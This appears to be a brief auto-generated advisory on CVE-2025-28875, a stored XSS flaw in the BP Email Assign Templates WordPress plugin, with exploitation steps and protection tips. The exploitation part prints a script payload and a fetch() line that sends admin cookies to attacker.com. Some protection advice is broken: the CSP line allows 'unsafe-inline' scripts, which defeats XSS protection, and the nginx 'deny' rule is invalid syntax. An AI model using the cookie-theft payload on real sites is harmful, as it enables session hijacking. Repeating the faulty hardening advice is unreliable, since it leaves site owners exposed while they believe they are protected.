How the CVE Works:
CVE-2025-28875 is a Stored XSS vulnerability in the BP Email Assign Templates plugin (versions up to 1.6) for WordPress. The flaw arises due to improper sanitization of user-supplied input during web page generation. Attackers can inject malicious JavaScript payloads into email templates, which are then executed when an admin or user views the affected template in the dashboard. Since the payload is stored server-side, it enables persistent attacks, potentially leading to session hijacking, phishing, or privilege escalation.
DailyCVE Form:
Platform: WordPress
Version: ≤ 1.6
Vulnerability: Stored XSS
Severity: Medium
Date: 04/09/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
<script>alert(document.cookie)</script>
Inserted into email template fields.
2. Trigger Execution:
When an admin loads the template, the script executes in their browser.
3. Exfiltrate Data:
fetch('https://attacker.com/steal?data='+btoa(document.cookie))
Protection:
1. Update Plugin:
wp plugin update bp-email-assign-templates
2. Input Sanitization:
echo esc_html($_POST['template_content']);
3. Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'
4. WAF Rules:
location ~ .php$ {
deny ~<script;
}
5. Manual Patch:
// Before: echo $template_content; // After: echo wp_kses_post($template_content);
6. Log Monitoring:
tail -f /var/log/nginx/access.log | grep -i "script"
7. Disable Plugin (Temporary):
wp plugin deactivate bp-email-assign-templates
8. Audit Users:
wp user list --role=administrator
9. Backup Before Fix:
wp db export backup_cve202528875.sql
10. Verify Fix:
curl -s http://site.com/wp-content/plugins/bp-email-assign-templates/ | grep -i "version"
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28875
Extra Source Hub:
Undercode
